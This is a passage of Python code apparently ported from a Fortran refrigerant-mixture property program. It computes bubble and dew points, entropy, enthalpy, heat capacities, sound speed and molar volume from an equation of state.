True\n\t\t\t\t\tFTNEG = FT[J]\n\t\t\t\t\tBData.TNEG = TT[J]\n\t\t\t\telse:\n\t\t\t\t\tLTPOS = True\n\t\t\t\t\tFTPOS = FT[J]\n\t\t\t\t\tBData.TPOS = TT[J]\n\n\t\t\t\tif (IT <= 1):\n\t\t\t\t\tTT[2] = 0.95 * TT[1]\n\t\t\t\t\tJ = 2\n\t\t\t\telse:\n\t\t\t\t\tDGDT = (FT[2] - FT[1]) / (TT[2] - TT[1] )\n\t\t\t\t\tif (DGDT == 0.0) :\n\t\t\t\t\t\tb_python_flag_loop1 = True\n\t\t\t\t\t\tbreak\t#\tGOTO 440\n\t\t\t\t\t# NEXT GUESS FOR TEMPERATURE GIVEN BY SECANT METHOD\n\t\t\t\t\tTT[3] = TT[2] - FT[2] / DGDT\n\t\t\t\t\t\n\t\t\t\t\t# IF NEXT GUESS FOR TEMPERATURE IS FURTHER FROM SOLUTION THAN\n\t\t\t\t\t# PREVIOUS BEST GUESS, USE REGULI - FALSI METHOD FOR NEXT GUESS\n\t\t\t\t\tif (LTNEG and LTPOS) :\n\t\t\t\t\t\tif (TT[3] < min(BData.TNEG, BData.TPOS) or TT[3] > max(BData.TNEG,BData.TPOS)) :\n\t\t\t\t\t\t\tTT[3] = BData.TPOS - FTPOS * (BData.TPOS - BData.TNEG) / (FTPOS - FTNEG)\n\t\t\t\t\t\n\t\t\t\t\tTT[1] = TT[2]\n\t\t\t\t\tFT[1] = FT[2]\n\t\t\t\t\tTT[2] = TT[3]\n\n\t\t\t# point 400 CONTINUE\n\t\t\t# if ITERATION HAS NOT CONVERGED, SET ERROR FLAG.\n\t\t\tif not b_python_flag_loop1:\n\t\t\t\tLPPCON = True\n\t\t\t# END OF PURE COMPONENT ITERATION\n\t\t\t#\n\t\t\t# point 440\tCONTINUE\n\t\t\tif (LV1CON): print ('bublp: iteration in bublp for parent phase volume, did not converge')\n\t\t\tif (LV2CON): print ('bublp: iteration in bublp for incipient phase volume, did not converge')\n\t\t\tif (LPPCON): print ('bublp: pure material temperature iteration in bublp, did not converge')\n\t\t\tT = TT[J]\n\t\t\treturn [XL,XV ,T,VL,VV, LCRIT]\n\t\t# end of IF\n\n\t\t#\n\t\t# ENTER ITERATION FOR MIXTURE\n\t\t#\n\t\t# THE MIXTURE ITERATION CONSISTS OF TWO CONCENTRIC ITERATION\n\t\t# LOOPS WHICH VARY THE TEMPERATURE OF THE MIXTURE AND THE\n\t\t# COMPOSITION OF THE COMPUTED PHASE TO GIVE EQUAL CHEMICAL\n\t\t# POTENTIALS FOR EACH OF THE COMPONENTS BETWEEN THE TWO PHASES.\n\t\t# THE INITIAL GUESS FOR THE TEMPERATURE IS GIVEN BY THE CALCULATION\n\t\t# ABOVE; THE INITIAL GUESS FOR COMPOSITION IS THAT X2 = X1.\n\t\t#\n\t\tJ = 1\n\t\tX2C = X1 [:]\n\t\t#for I in range(1, BData.NC +1 ): # DO 500 I = 1,BData.NC\n\t\t#\tX2C[I] = X1[I]\n\n\t\tif (LBUB) :\n\t\t\tV1 = VL\n\t\t\tV2 = VV\n\t\telse:\n\t\t\tV1 = VV\n\t\t\tV2 = VL\n\n\t\tLTNEG = False\n\t\tLTPOS = False\n\n\t\tb_python_flag_loop8 = False\n\t\tfor ITT in range(1, BData.ITMAX + 1): # DO 800 ITT = 1,ITMAX\n\t\t\tXX2 = X2C[:]\n\t\t\t#for I in range(1, BData.NC +1 ): # DO 520 I = 1,BData.NC\n\t\t\t#\tXX2[I] = X2C[I]\n\t\t\t\t\n\t\t\tLXCON = False\n\t\t\tLV1CON = False\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A1, B1] = self.espar(0, TT[J], X1 ) \t\t\t\t\t# CALL espar (0,TT(J),X1, A1, B1)\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V1, LV1CON] = self.vit (TT[J] , P, A1, B1, V1, LBUB)\t\t# CALL VIT (TT(J), P, A1, B1,V1,LBUB,LV1CON)\n\t\t\t#\n\t\t\t# IF VOLUME ITERATION HAS NOT CONVERGED, TRY BData.A NEW TEMPERATURE AND\n\t\t\t# RETURN TO THE BEGINNING OF THE ITERATION\n\t\t\t#\n\t\t\tif (LV1CON or LXCON) :\n\t\t\t\tTT[J] = 0.95 * TT[J]\n\t\t\t\tcontinue # GOTO 800 exit loop\n\t\t\t\n\t\t\t# COMPUTE CHEMICAL POTENTIALS FOR PHASE 1\n\t\t\tfor I in range(1, BData.NC + 1): # DO 540 I = 1,BData.NC\n\t\t\t\tU1[I] = self.U_Func (TT[J],X1,I,V1, A1,B1, BData.AP,BData.BP,BData.F)\n\t\t\t#\n\t\t\t# ENTER INNER ITERATION LOOP (FOR COMPOSITION OF PHASE 2)\n\t\t\t#\n\t\t\t#JJ = 1 useless allway one, used once\n\t\t\tLXNEG = False\n\t\t\tLXPOS = False\n\t\t\t\n\t\t\tb_python_flag_loop3 = False\n\t\t\tb_python_flag_outer = False\n\t\t\tfor IT in range(1, BData.ITMAX + 1): # DO 600 IT = 1,ITMAX\n\t\t\t\tLV2CON = False\n\t\t\t\t# COMPUTE EQUATION OF STATE COEFFICIENTS FOR PHASE 2\n\t\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t\t[A2, B2] = self.espar(0, TT[J], XX2 ) # JJ allway 1\tCALL espar (0,TT(J),XX2(JJ), A2, B2)\n\t\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t\t[V2, LV2CON] = self.vit (TT[J], P, A2, B2, V2, not LBUB)\t\t# CALL VIT (TT(J),P, A2, B2, V2,.NOT.LBUB, LV2CON)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# if VOLUME ITERATION HAS NOT CONVERGED, TRY BData.A NEW TEMPERATURE\n\t\t\t\t# AND RETURN TO THE START OF THE TEMPERATURE ITERATION.\n\t\t\t\t#\n\t\t\t\tif (LV2CON) :\n\t\t\t\t\tb_python_flag_outer = True\n\t\t\t\t\tTT[J] = 0.95 * TT[J]\n\t\t\t\t\tcontinue\t# GOTO 800\n\n\t\t\t\t# COMPUTE CHEMICAL POTENTIALS OF PHASE 2\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 560 I = 1,BData.NC\n\t\t\t\t\tU2[I] = self.U_Func (TT[J], XX2,I,V2, A2,B2, BData.AP,BData.BP,BData.F)\n\t\t\t\t#\n\t\t\t\t# CALCULATE THE COMPOSITION OF PHASE 2 FROM THE COMPOSITION\n\t\t\t\t# OF PHASE 1 AND THE CHEMICAL POTENTIALS. THE INNER ITERATION\n\t\t\t\t# LOOP HAS CONVERGED WHEN THE CALCULATED COMPOSITION EQUALS\n\t\t\t\t# (WITHIN BData.A CONVERGENCE TOLERANCE) THE GUESSED VALUE OF X2.\n\t\t\t\t#\n\t\t\t\tFXSUM = 0.0\n\t\t\t\tC = 0.0\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 580 I = 1,BData.NC\n\t\t\t\t\tZ[I] = X1[I] * math.exp(U1[I] - U2[I])\n\t\t\t\t\tC = C + Z[I]\n\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 584 I = 1,BData.NC\n\t\t\t\t\tX2C[I] = Z[I] / C\n\t\t\t\t\tFX2[I] = X2C[I] - XX2[I]\n\t\t\t\t\tXX2[I] = X2C[I]\n\t\t\t\t\tFXSUM = FXSUM + abs(FX2[I])\n\n\t\t\t\tif(IT <= 1): FXOLD = 1.0E6\n\n\t\t\t\tif (FXSUM < BData.NC * BData.TOLR):\n\t\t\t\t\tb_python_flag_loop3 = True\n\t\t\t\t\tbreak \t# GO TO 640\n\n\t\t\t\tFXDIF = abs(FXSUM - FXOLD)\n\t\t\t\t\n\t\t\t\tif(FXDIF <= 10.0 * BData.TOLR and IT >= BData.ITMAX):\n\t\t\t\t\tb_python_flag_loop3 = True\n\t\t\t\t\tbreak \t# GO TO 640\n\n\t\t\t\tFXOLD = FXSUM\n\t\t\t# end of loop \t600 CONTINUE\n\t\t\t\n\t\t\tif b_python_flag_outer :\n\t\t\t\tcontinue # goto 800\n\t\t\t\t\n\t\t\t# IF INNER ITERATION LOOP HAS NOT CONVERGED, SET ERROR FLAG\n\t\t\tif not b_python_flag_loop3:\n\t\t\t\tprint (IT, FXSUM, BData.NC * BData.TOLR,FXSUM / (BData.NC * BData.TOLR), FXDIF)\n\t\t\t\tLXCON = True\n\t\t\t#\n\t\t\t# END OF ITERATION LOOP FOR PHASE 2 COMPOSITION\n\n\t\t\t# point 640 Con\n\t\t\tFT[J] = 1.0 - C\n\t\t\t#\n\t\t\t# OUTER (TEMPERATURE) ITERATION HAS CONVERGED WHEN BData.C = 1.000\n\t\t\t# (I.E. WHEN THE CHEMICAL POTENTIALS OF EACH COMPONENT ARE\n\t\t\t# THE SAME IN BOTH PHASES).\n\t\t\t#\n\n\t\t\tif (abs(FT[J]) < 100.0 * BData.TOLR):\n\t\t\t\tb_python_flag_loop8 = True\n\t\t\t\tbreak\t#GOTO 840\n\t\t\t#\n\t\t\t# PROVIDED THAT THE X2 ITERATION HAS CONVERGED FOR THE CURRENT\n\t\t\t# GUESS OF TEMPERATURE, UPDATE THE POSITIVE AND NEGATIVE\n\t\t\t# BOUNDS FOR USE WITH THE REGULI - FALSI METHOD.\n\t\t\t#\n\t\t\tif (not LXCON) :\n\t\t\t\tif (FT[J] < 0.0) :\n\t\t\t\t\tLTNEG = True\n\t\t\t\t\tFTNEG = FT[J]\n\t\t\t\t\tBData.TNEG = TT[J]\n\t\t\t\telse:\n\t\t\t\t\tLTPOS = True\n\t\t\t\t\tFTPOS = FT[J]\n\t\t\t\t\tBData.TPOS = TT[J]\n\t\t\t#\n\t\t\t# COMPUTE NEW GUESS FOR SATURATION TEMPERATURE.\n\t\t\t# FOR THE SECOND ITERATION, COMPUTE AN APPROXIMATE SATURATION\n\t\t\t# PRESSURE CORRESPONDING TO THE CURRENT GUESS OF TEMPERATURE\n\t\t\t# AND ADJUST THE GUESS FOR TEMPERATURE ACCORDING TO THE\n\t\t\t# DEVIATION BETWEEN THE CALCULATED AND INPUT PRESSURES\n\t\t\t#\n\t\t\tif (ITT <= 2) :\n\t\t\t\tif (LBUB) :\n\t\t\t\t\tP2 = P * C\n\t\t\t\telse:\n\t\t\t\t\tP2 = P / C\n\t\t\t\t\n\t\t\t\tTT[3] = 1.0 / (1.0 / TT[J] + 0.0004 * (math.log(P2) - math.log(P)))\n\t\t\t\t\n\t\t\t\tif (J <= 1) :\n\t\t\t\t\tJ = 2\n\t\t\t\telse:\n\t\t\t\t\tTT[1] = TT[2]\n\t\t\t\t\tFT[1] = FT[2]\n\t\t\t\t\n\t\t\t\tTT[2] = TT[3]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\t# FOR THIRD AND SUBSEQUENT ITERATIONS, USE SECANT / REGULI - FALSI\n\t\t\t\tTT[3] = TT[2] - FT[2] * (TT[2] - TT[1]) / (FT[2] - FT[1])\n\t\t\t\t\n\t\t\t\tif ((TT[3] > max(BData.TNEG,BData.TPOS) or \t\\\n\t\t\t\t\tTT[3] < min(BData.TNEG,BData.TPOS)) and LTNEG and LTPOS):\n\t\t\t\t\t\n\t\t\t\t\tTT[3] = BData.TPOS - FTPOS * (BData.TPOS - BData.TNEG) / (FTPOS - FTNEG)\n\t\t\t \n\t\t\t\tTT[1] = TT[2]\n\t\t\t\tTT[2] = TT[3]\n\t\t\t\tFT[1] = FT[2]\n\t\t\t\n\t\t#\n\t\t# End of loop 800 CONTINUE\n\n\t\tif not\tb_python_flag_loop8 :\n\t\t\tprint (BData.LUP, 'MIXTURE TEMPERATURE ITERATION IN BUBLP DID NOT, CONVERGE')\n\t\t\n\t\t# point 840\n\t\tT = TT[J]\n\t\t# \n\t\t#\n\t\t# ASSIGN RESULTS FOR PHASES 1 AND 2 TO LIQUID AND VAPOR PHASES\n\t\t# DEPENDING ON WHETHER THE DEW OR BUBBLE POINT WAS CALCULATED.\n\t\t#\n\t\tif (LBUB) :\n\t\t\t#for I in range(1, BData.NC + 1): # DO 860 I = 1,BData.NC\n\t\t\t#\tXV[I] = XX2[I]\n\t\t\tXV = XX2[:]\n\t\t\tVL = V1\n\t\t\tVV = V2\n\t\t\t\n\t\telse:\n\t\t\t#for I in range(1, BData.NC + 1): # DO 880 I = 1,BData.NC\n\t\t\t#\tXL[I] = XX2[I]\n\t\t\tXL = XX2[:]\n\t\t\tVL = V2\n\t\t\tVV = V1\n\t\t#\n\t\t# PRINT WARNING MESSAGES FOR ANY CASES OF NON - CONVERGENCE OCCURING\n\t\t# ON FINAL CALL TO EACH ITERATION AND RETURN.\n\t\t#\n\t\tif (abs(1.0 - VL / VV) < BData.TOLR) :\n\t\t\tLCRIT = True\n\t\t\tprint(BData.LUP, 'CRITICAL POINT EXCEEDED IN BUBLP')\n\t\t\n\t\tif (LV1CON): print (BData.LUP, 'ITERATION IN BUBLP FOR PARENT PHASE VOLUME DID')\n\t\tif (LV2CON): print (BData.LUP, 'ITERATION IN BUBLP FOR INCIPIENT PHASE VOLUME DID, NOT CONVERGE')\n\t\tif (LXCON) : print (BData.LUP, 'COMPOSITION ITERATION IN BUBLP DID NOT CONVERGE')\n\n\t\treturn [XL,XV ,T,VL,VV, LCRIT]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef entrop (self, T,V,X ):\n\n\t\t#\t FUNCTION ENTROP(T,V,X)\n\t\t#\n\t\t# COMPUTE SPECIFIC ENTROPY OF A SINGLE PHASE TWO-COMPONENT MIXTURE\n\t\t# AS A FUNCTION OF TEMPERATURE, SPECIFIC VOLUME, AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# V - SPECIFIC VOLUME (M**3/KG MOL)\n\t\t# X - COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUT:\n\t\t# S - SPECIFIC ENTROPY (KJ/(KG MOL K))\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED BY ENTROP:\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION X(5)\n\t\t#\t COMMON /NCOMP/ NC\n\n\t\t#\t COMMON /ESPAR1/ AP(5),BP(5),F(5,5), C1,D1,C2,D2\n\t\t# similar to COMMON /ESPAR1/ AP(5),BP(5),F(5,5), DADT,DBDT,D2ADT,D2BDT\n\n\t\t#\t COMMON /HSPURE/ HP(5),SP(5),CP(5)\n\t\t#\t COMMON /REF/ TREF(5),HR(5),SR(5),VR(5)\n\t\t#\t COMMON /RDATA4/ R\n\t\t[A, B] = self.espar (1, T, X)\t# CALL espar (1,T,X ,A,B)\n\t\t\n\t\tB4 = 0.25 * B\n\t\tS = (BData.DADT * B - A * BData.DBDT)/ (B**2 ) * math.log((V+B)/V) + A * BData.DBDT/B/(V+B) \\\n\t\t\t-BData.R*B4/(V-B4)**2 *(4.0*V-3*B4)\t\t\\\n\t\t\t-BData.R*T*BData.DBDT*0.5*V/(V-B4)**3 *(2.0*V-B4)\n\n\t\tfor I in range (1, BData.NC +1): \t#DO 120 I=1,NC\n\t\t\tS = S + X[I] * (BData.SP[I] - BData.SR[I] + BData.R * math.log(V/ BData.VR[I]))\n\n\t\t\tif (X[I] > 0.0 and X[I] < 1.0) :\n\t\t\t\tS = S - BData.R * X [I] * math.log(X[I])\n\n\t\treturn S\n\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef hcvcps (self, IQ, T, V, X):\t# H, CV, CP, VS\n\t\t# [P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t# SUBROUTINE HCVCPS (IQ, T, V, X, H, CV, CP, VS)\n\t\t#\n\t\t# GIVEN TEMPERATURE, SPECifIC VOLUME AND COMPOSITION COMPUTE ENTHALPY\n\t\t# AND / OR HEAT CAPACITY AT CONSTANT VOLUME AND PRESSURE AS SPECifIED\n\t\t# BY OUTPUT QUALifIER IQ. (SINGLE PHASE ONLY)\n\t\t#\n\t\t# INPUTS:\n\t\t# IQ - OUTPUT QUALifIER\n\t\t# = 1 COMPUTE ENTHALPY ONLY\n\t\t# = 2 ENTHALPY AND CONSTANT VOLUME HEAT CAPACITY\n\t\t# = 3 ENTHALPY AND HEAT CAPACITY AT CONSTANT VOLUME AND PRESSURE\n\t\t# = 4 COMPUTE HEAT CAPACITY AT CONSTANT VOLUME ONLY\n\t\t# = 5 HEAT CAPACITY AT CONSTANT VOLUME AND AT CONSTANT PRESSURE\n\t\t# T - TEMPERATURE (K)\n\t\t# V - SPECIFIC VOLUME (M * * 3 / KG MOL)\n\t\t# X - COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# H - SPECIFIC ENTHALPY (KJ / KG MOL)\n\t\t# CV - HEAT CAPACITY AT CONSTANT VOLUME (KJ / (KG MOL K))\n\t\t# CP - HEAT CAPACITY AT CONSTANT PRESSURE (KJ / (KG MOL K))\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED BY HCVCP:\n\t\t# espar - COMPUTATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A - H,O - Z)\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / ESPAR1 / BData.AP(5),BData.BP(5),BData.F(5,5), C1,D1,C2,D2\n\t\t# simlar to /ESPAR1/ AP(5),BP(5),F(5,5), DADT,DBDT,D2ADT,D2BDT\n\t\t#\t COMMON / HSPURE / HP(5),SP(5),BData.CP(5)\n\t\t#\t COMMON / REF / BData.TREF(5),BData.HR(5),SR(5),VR(5)\n\t\t#\t COMMON / RDATA2 / BData.WM(5),TC(5)\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t DIMENSION X(5)\n\t\t#X = [0.0] * (5+1)\n\n\t\t[A, B] = self.espar (IQ,T,X)\t#CALL espar (IQ,T,X,A,B)\n\t\tB4 = 0.25 * B\n\t\tVB = V + B\n\t\t\n\t\tif (V / VB) <= 0 or B<=0:\n\t\t\tprint (\"hcvcps : bad input parameter, V/(V+B)<= 0 or B<=0\")\n\t\t\tprint (\" input B for the given X =\", B)\n\t\t\tprint (\" input Temperature(K) =\", T)\n\t\t\tprint (' input X ' , X)\n\t\t\tprint (' input V ' , V)\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit \t# ('1030')\n\t\t\t\n\t\tVBL = math.log(V / VB)\n\t\tVB4 = V - B4\n\t\t\n\t\tVB43 = VB4**3\t#pow(VB4, 3)\n\t\tRT = BData.R * T\n\t\t\n\t\tH = 0.0 # python in case if IQ =4 H will have no value\n\t\tVS = 0.0 # python in case if IQ =4 H will have no value\n\t\tCV = 0.0 # python in case if IQ =4 H will have no value\n\t\tCP = 0.0 \n\t\t\n\t\tif (IQ <= 3) :\n\t\t\t# COMPUTE ENTHALPY AS A FUNCTION OF T, V, X\n\t\t\tH = ( (A + (A * BData.DBDT / B - BData.DADT) * T) * VBL + A * (BData.DBDT * T - B) / VB) / B\t\t\\\n\t\t\t\t+ 2.0 * RT * V * (2.0 * V - B4) * (B4 - 0.25 * BData.DBDT * T) / VB43\n\t\t\t\t\n\t\t\tfor I in range(1, BData.NC + 1): # DO 120 I = 1,BData.NC\n\t\t\t\tH = H + X[I] * (BData.HP[I] - BData.HR[I])\n\t\t\n\t\tif (IQ >= 2) :\n\t\t\t# COMPUTE CONSTANT VOLUME HEAT CAPACITY\n\t\t\tD12 = BData.DBDT * BData.DBDT\n\t\t\tCV = (BData.R * V * ((0.375 * D12 * T / VB4 \t\\\n\t\t\t\t+ 0.5 * BData.D2BDT * T + BData.DBDT) * (B4 - 2.0 * V)\t\\\n\t\t\t\t+ 0.125 * D12 * T) / VB43\t\t\t\t\t\t\\\n\t\t\t\t+ ((1.0 / VB + VBL / B) * (A * BData.D2BDT * B \t\\\n\t\t\t\t+ 2.0 * (BData.DADT * BData.DBDT * B - A * D12)) / B\t\\\n\t\t\t\t- BData.D2ADT * VBL - A * D12 / (VB **2)) / B) * T - BData.R\n\n\t\t\tfor I in range( BData.NC + 1): # DO 160 I = 1,BData.NC\n\t\t\t\tCV = CV + X[I] * BData.CP[I]\n\n\t\t\tif (IQ == 3 or IQ == 5):\n\t\t\t\t# COMPUTE SPECIFIC HEAT AT CONSTANT PRESSURE USING CV\n\t\t\t\tY = B4 / V\n\t\t\t\tDPDT = 2.0 * BData.R / VB4 * ( - 1.0 + ( - 0.25 * T * BData.DBDT + (V * V * (1.0 + 0.75 * T * BData.DBDT / VB4))\t\t\\\n\t\t\t\t\t/ VB4) / VB4) + (BData.R + ( - BData.DADT + A * BData.DBDT / VB) / VB) / V\n\n\t\t\t\t#DPDV = ( - RT * (1.0 + (4.0 + (4.0 + ( - 4.0 + Y) * Y) * Y) * Y) / (pow(1.0 - Y,4))\t\\\n\t\t\t\t#\t+ A * (2.0 * V + B) / (VB *VB)) / (V * V )\n\t\t\t\t\t\n\t\t\t\tDPDV = ( - RT * (1.0 + (4.0 + (4.0 + ( - 4.0 + Y) * Y) * Y) * Y) / ( (1.0 - Y)**4 )\t\\\n\t\t\t\t\t+ A * (2.0 * V + B) / (VB *VB)) / (V * V )\n\n\t\t\t\tCP = CV - DPDT * DPDT * T / DPDV\n\t\t\t\t\n\t\t\t\t# COMPUTE VELOCITY OF SOUND USING C'S AND VOLUME DERIVATIVE OF P\n\t\t\t\tWMOL = 0.0\n\t\t\t\tfor I in range(1, BData.NC+1 ): # DO 180 I = 1,BData.NC\n\t\t\t\t\tWMOL = WMOL + X[I] * BData.WM[I]\n\t\t\t\t\n\t\t\t\tVS = V * math.sqrt( - 1000.0 * CP * DPDV / (WMOL * CV))\n\n\t\treturn [H, CV, CP, VS]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef vit (self, T, P, para_A, para_B, VS, LLIQI): # VS, LVCON\n\t\t# [P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t#\t\t SUBROUTINE VIT (T,P,para_A,para_B,VS,LLIQI,LVCON)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# GIVEN TEMPERATURE, PRESSURE, AND EQUATION OF STATE\n\t\t# PARAMETERS, THIS ROUTINE CALCULATES THE LIQUID OR VAPOR\n\t\t# MOLAR VOLUME THAT SATISFIES THE EQUATION OF STATE.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# P - PRESSURE (KPA)\n\t\t# para_A,para_B - EQUATION OF STATE PARAMETERS AT TEMPERATURE T\n\t\t# VS - INITIAL GUESS FOR VOLUME. IN ABSENCE OF BETTER\n\t\t# GUESSES SUGGESTED VALUES ARE:\n\t\t# LIQUID: VS = 0.8 * para_B\n\t\t# VAPOR: VS = R * T / P\n\t\t# LLIQI - LOGICAL VARIABLE\n\t\t# if LLIQI = True COMPUTE LIQUID VOLUME\n\t\t# if LLIQI = False COMPUTE VAPOR VOLUME\n\t\t# NOTE: if EITHER THE TEMPERATURE OR THE PRESSURE IS ABOVE\n\t\t# THE CRITICAL VALUE, ONLY ONE SOLUTION EXISTS AND THE\n\t\t# VALUE OF LLIQI HAS NO EFFECT.\n\t\t#\n\t\t# OUTPUTS:\n\t\t# VS - MOLAR VOLUME (M * * 3 / KG MOL)\n\t\t# LVCON - ERROR FLAG; if LVCON = True THE ITERATION HAS\n\t\t# NOT CONVERGED\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# NONE\n\t\t#\n\t\t# (FOR EXPLANATION OF NOMENCLATURE SEE BUBLT)\n\t\t#\n\t\t# NOTE: THIS ROUTINE IS WRITTEN IN DOUBLE PRECISION EXCEPT\n\t\t# THAT THE ARGUMENTS ARE SINGLE PRECISION\n\t\t#\n\t\t#\t IMPLICIT DOUBLE PRECISION (para_A - H,O - Z)\n\t\t#\t LOGICAL LLIQ,LVCON,LLIQI\n\t\t#\t REAL T,P, para_A, para_B, R, VS, TOLR, TC, PC\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t COMMON / TOL / TOLR,ITmath.max,LUP\n\t\t\n\t\tif para_B <= 0 or VS <=0:\n\t\t\tprint (\"vit : bad input parameter, B <= 0, B=\",para_B)\n\t\t\tprint (\"vit : bad input parameter, VS <= 0, VS=\",VS)\n\t\t\tprint (\" input Temperature(K) =\", T, \" pressure(kPa)=\", P )\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit\t#('1020')\n\t\t\t\n\t\tLVCON = False\n\t\tLLIQ = LLIQI\n\t\tV = VS\n\t\t\t\t\n\t\tVL = math.log(V)\n\t\tPL = math.log(P)\n\t\tRT = BData.R * T\n\t\tB4 = 0.25 * para_B\n\t\t\n\t\tB4L = math.log(B4)\n\t\t\t\n\t\tif (VL < B4L):\n\t\t\tVL = B4L + 0.5\n\t\t\n\t\t\n\t\tTC = para_A / (para_B * 4.398909 * BData.R)\n\n\t\tPC = 0.02386944 * para_A / pow(para_B, 2)\n\n\t\tVCL = math.log(12.0272727 * B4)\n\n\t\tif (P > PC) :\n\t\t\tLLIQ = True\n\t\telif (T > TC) :\n\t\t\tLLIQ = False\n\n\t\t#\n\t\t# ENTER NEWTONS METHOD ITERATION FOR VOLUME. FOR LIQUIDS\n\t\t# (OR FLUIDS ABOVE THE CRITICAL PRESSURE) THE ITERATION\n\t\t# IS CARRIED OUT IN TRANSFORMED COORDINATES OF LOG (V). FOR\n\t\t# VAPOR (OR FLUIDS AT SUPERCRITICAL TEMPERATURES BUT PRESSURES\n\t\t# BELOW THE CRITICAL VALUE) THE ITERATION IS IN TERMS OF\n\t\t# LOG (V) AND LOG (P). THE ITERATION HAS CONVERGED WHEN\n\t\t# THE PRESSURE CALCULATED FROM THE EQUATION OF STATE AGREES\n\t\t# WITH THE INPUT PRESSURE.\n\t\t#\n\t\tfor IT in range(1, BData.ITMAX + 1 ): # DO 100 IT = 1,ITmath.max\n\t\t\tif ( ( (VL > VCL) == LLIQ ) and P < PC):\n\t\t\t\tVL = VCL\n\t\t\tVLS = VL\n\t\t\tY = B4 / V\n\t\t\tVB = V + para_B\n\t\t\t#\n\t\t\t# CALCULATE PRESSURE AS para_A FUNCTION OF VOLUME AND THE\n\t\t\t# DERIVATIVE OF THE PRESSURE W.R.T. LOG (VOLUME).\n\t\t\t#\n\t\t\tP2=( RT * (1.0+(1.0+(1.0-Y)*Y)*Y) / (1.0-Y)**3-para_A/VB)/V\n\t\t\tDPDLV = RT / V * ( - 1.0 + ( - 4.0 + ( - 4.0 + (4.0 - Y) * Y) * Y) * Y) / ( pow (1.0 - Y, 4) )\t\\\n\t\t\t\t\t+ para_A * (2.0 * V + para_B) / (V * VB * VB)\n\n\t\t\tif (LLIQ) :\n\t\t\t\tif (DPDLV >= 0.0) :\n\t\t\t\t\tVL = 0.5 * (B4L + VLS)\n\t\t\t\telse:\n\t\t\t\t\tFVDP = (P2 - P) / DPDLV\n\t\t\t\t\t#print (\"Ayman Check .. need to be 100* TOLR, this value is not possible\" )\n\t\t\t\t\t#if (abs(FVDP / P) < 0.001 * BData.TOLR) :\n\t\t\t\t\tif (abs(FVDP / P) < BData.TOLR) :\n\t\t\t\t\t\tVS = math.exp(VL)\n\t\t\t\t\t\treturn [VS, LVCON]\n\t\t\t\t\telse:\n\t\t\t\t\t\tVL = VL - FVDP\n\t\t\t\t\t\tif (VL <= B4L):\n\t\t\t\t\t\t\tVL = 0.5 * (B4L + VLS)\n\t\t\telse:\n\t\t\t\tif (DPDLV >= 0.0 or P2 <= 0.0) :\n\t\t\t\t\tVL = VL + 0.5\n\t\t\t\telse:\n\t\t\t\t\tFVDPL = (math.log(P2) - PL) * P2 / DPDLV\n\t\t\t\t\tif (abs(FVDPL) < 0.001 * BData.TOLR) :\n\t\t\t\t\t\tVS = math.exp(VL)\n\t\t\t\t\t\treturn\t[VS, LVCON]\n\n\t\t\t\t\tVL = VL - FVDPL\n\t\t\t\t\tif (abs(VL - VLS) > 1.5):\n\t\t\t\t\t\t#----------------------------------------------\n\t\t\t\t\t\tif VL >= VLS :\t#VL = VLS + SIGN(1.0D0,VL - VLS)\n\t\t\t\t\t\t\tVL = VLS + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tVL = VLS - 1\n\t\t\t\t\t\t#----------------------------------------------\n\t\t\t\t\tif (VL < VCL):\n\t\t\t\t\t\tVL = 0.5 * (VLS + VCL)\n\t\t\tV = math.exp(VL)\n\t\t\t# end of loop 100 ==================== CONTINUE\n\t\tLVCON = True\n\t\tVS = V\n\t\treturn [VS, LVCON]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef spxsp (self, S,P,X, TSAT,SSAT,VSAT, LLIQ) : # ,T2,V,LLIQ\n\t\t# [T2,V] = spxsp (self, S,P,X,TSAT,S ,LLIQ)\n\t\t#\t[p4,p8]= self.spxsp(p1 to p6, p9)\n\t\t# SUBROUTINE SPXSP (S,P,X, TSAT,SSAT,VSAT, T2,V,LLIQ)\n\t\t#\n\t\t# SUBROUTINE TO ITERATE FOR THE TEMPERATURE OF A SINGLE PHASE\n\t\t# BINARY MIXTURE GIVEN ENTHALPY, PRESSURE, AND COMPOSITION.\n\t\t# CALLED ONLY BY SPIN.\n\n\t\t# 